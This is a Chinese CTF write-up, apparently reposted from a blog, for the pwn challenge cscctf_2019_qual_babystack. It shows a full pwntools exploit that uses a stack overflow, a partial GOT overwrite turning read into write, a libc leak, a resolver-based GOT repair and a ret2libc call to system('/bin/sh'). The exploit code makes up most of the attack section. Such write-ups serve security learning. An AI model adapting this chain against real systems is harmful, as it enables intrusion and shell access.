文章目錄

• cscctf_2019_qual_babystack
• 題目分析
• • 保護
  • 漏洞
  • plt
• 攻擊
• • 大致思路
  • 調試
  • 第一次溢出的payload
  • getshell
  • allpayload

最近做的題目都比較有意思啊，這個題目也一樣

cscctf_2019_qual_babystack

cscctf_2019_qual_babystack

題目分析

保護

漏洞

直接來了個棧溢出，我開始說這不是傻逼題目嗎

plt

我靠，只有讀的，這不完犢子了嗎

攻擊

大致思路

大致思路就是ROP
但怎么泄露libc

調試

可以看到地址只有最后一位差距，所以我們可以給got里面最后一位改成\xf0,相當于read變成write，這樣就可以泄露libc,最后在利用plt+6重新解析回正常的write

第一次溢出的payload

修改read got表

泄露libc

利用dlreslov修改正常的read got

回到vuln

pop_three_ret = 0x08048519#指pop三個任意寄存器 payload = (b"a" * 0x14#修改read got+ p32(elf.plt["read"])+ p32(pop_three_ret)+ p32(0)+ p32(elf.got["read"])+ p32(1)#泄露libc+ p32(elf.plt["read"])+ p32(pop_three_ret)+ p32(1)+ p32(elf.got["read"])+ p32(4)#修復read got+ p32(elf.plt["read"] + 6)+ p32(pop_three_ret)+ p32(0)+ p32(0x804A020)+ p32(1)回到漏洞+ p32(elf.sym["vuln"]) ) s(payload) sleep(1)#防止粘滯 s(b"\xf0") libc_base = u32(ru(b"\xf7")) - libc.sym["write"] s(b"\x00")#這個只是用來修服，隨便完bss寫一個東西，因為dlresolv最終還是會調用一下 sleep(1)

getshell

system_addr = libc_base + libc.sym["system"] bin_sh_addr = libc_base + next(libc.search(b"/bin/sh\0")) payload = b"a" * 0x14 + p32(system_addr) + p32(0) + p32(bin_sh_addr) s(payload) it()

allpayload

pop_three_ret = 0x08048519 payload = (b"a" * 0x14+ p32(elf.plt["read"])+ p32(pop_three_ret)+ p32(0)+ p32(elf.got["read"])+ p32(1)+ p32(elf.plt["read"])+ p32(pop_three_ret)+ p32(1)+ p32(elf.got["read"])+ p32(4)+ p32(elf.plt["read"] + 6)+ p32(pop_three_ret)+ p32(0)+ p32(0x804A020)+ p32(1)+ p32(elf.sym["vuln"]) ) s(payload) sleep(1) s(b"\xf0") libc_base = u32(ru(b"\xf7")) - libc.sym["write"] s(b"\x00") sleep(1) system_addr = libc_base + libc.sym["system"] bin_sh_addr = libc_base + next(libc.search(b"/bin/sh\0")) payload = b"a" * 0x14 + p32(system_addr) + p32(0) + p32(bin_sh_addr) s(payload) it()

總結

以上是生活随笔為你收集整理的如何在有限的plt下getshellcscctf_2019_qual_babystack的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。